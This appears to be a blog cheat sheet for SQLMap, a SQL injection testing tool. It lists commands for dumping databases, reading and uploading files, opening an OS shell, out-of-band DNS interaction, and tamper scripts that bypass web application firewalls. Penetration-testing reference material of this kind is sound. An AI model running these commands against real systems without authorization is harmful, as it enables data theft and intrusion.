Twitter Facebook LinkedIn Reddit Email WhatsApp
Post Views 426
What is SQLMap? SQLMap is an open-source penetration testing tool that automates the detection and exploitation of SQL injection flaws and takes over database servers.
Basic SQLMap Commands Command Description sqlmap -u <URL>Scan the URL for SQL injection vulnerabilities sqlmap -r <request_file>Scan from a saved HTTP request file sqlmap -u <URL> --dbsList available databases on the target sqlmap -u <URL> -D <db_name> --tablesList tables in a specific database sqlmap -u <URL> -D <db_name> -T <table_name> --columnsList columns in a specific table sqlmap -u <URL> -D <db_name> -T <table_name> -C <columns> --dumpDump data from specific columns sqlmap -u <URL> --dump-allDump the entire database sqlmap -u <URL> --os-shellGet a command shell on the operating system sqlmap -u <URL> --dbms <DBMS>Force SQLMap to use a specific database management system (e.g., MySQL, PostgreSQL)
Advanced Usage 1. Specifying Data Parameters If the vulnerable parameter isn’t in the URL, you can specify it manually.
Command Description sqlmap -u <URL> --data="param1=value1¶m2=value2"Inject SQL into POST request parameters sqlmap -u <URL> --method PUT --data="param1=value1"Use HTTP PUT method with SQLMap
2. Cookie-based SQL Injection If the vulnerability is within the cookies, you can pass the cookie values.
Command Description sqlmap -u <URL> --cookie="PHPSESSID=abcd1234"Use cookies to authenticate and test for vulnerabilities
3. Scan with Specific User-Agent Command Description sqlmap -u <URL> --user-agent="Mozilla/5.0"Spoof the User-Agent header in the request
4. Use a Proxy Command Description sqlmap -u <URL> --proxy="http://localhost:8080"Route the SQLMap traffic through a proxy (e.g., Burp Suite)
Enumeration 1. Get Database Version sqlmap -u <URL> --banner2. List Databases sqlmap -u <URL> --dbs3. List Tables in a Specific Database sqlmap -u <URL> -D <db_name> --tables4. List Columns in a Specific Table sqlmap -u <URL> -D <db_name> -T <table_name> --columns5. Dump Table Data sqlmap -u <URL> -D <db_name> -T <table_name> --dump6. Dump Specific Columns sqlmap -u <URL> -D <db_name> -T <table_name> -C <column1,column2> --dumpExploitation Options 1. File System Access Command Description sqlmap -u <URL> --file-read <file>Read a file from the target’s file system sqlmap -u <URL> --file-write <local_file> --file-dest <remote_file>Upload a file to the target
2. Command Shell Command Description sqlmap -u <URL> --os-shellGet an interactive operating system shell on the target
3. Out-of-Band Connections Command Description sqlmap -u <URL> --dns-domain=<domain>Perform out-of-band (OOB) interaction via DNS sqlmap -u <URL> --dns-server=<server>Specify a DNS server for OOB interactions
Other Useful Flags Command Description sqlmap -u <URL> --batchAutomatically skip prompts (useful for automation) sqlmap -u <URL> --tamper=<tamper_script>Use tamper scripts to bypass WAF/IDS (e.g., --tamper=space2comment) sqlmap -u <URL> --level=<level>Set the level of tests (1 to 5, higher levels test more parameters) sqlmap -u <URL> --risk=<risk>Set the risk level of tests (1 to 3, higher risks may cause more intrusive operations) sqlmap -u <URL> --random-agentUse a randomly chosen User-Agent string
Example Commands 1. Basic SQL Injection Scan sqlmap -u http://example.com/index.php?id=12. Dump Entire Database sqlmap -u http://example.com/index.php?id=1 --dump-all3. Dump Specific Database Table sqlmap -u http://example.com/index.php?id=1 -D testdb -T users --dump4. Bypass WAF Using Tamper Script sqlmap -u http://example.com/index.php?id=1 --tamper=space2commentTamper Scripts Tamper scripts can help you bypass Web Application Firewalls (WAFs) by modifying SQL queries. Some common tamper scripts:
Script Description space2comment.pyReplaces space characters with inline comments between.pyReplaces SQL operators with the BETWEEN clause randomcase.pyRandomizes the case of SQL keywords
Usage Example: sqlmap -u http://example.com/index.php?id=1 --tamper=space2comment
Leave a Reply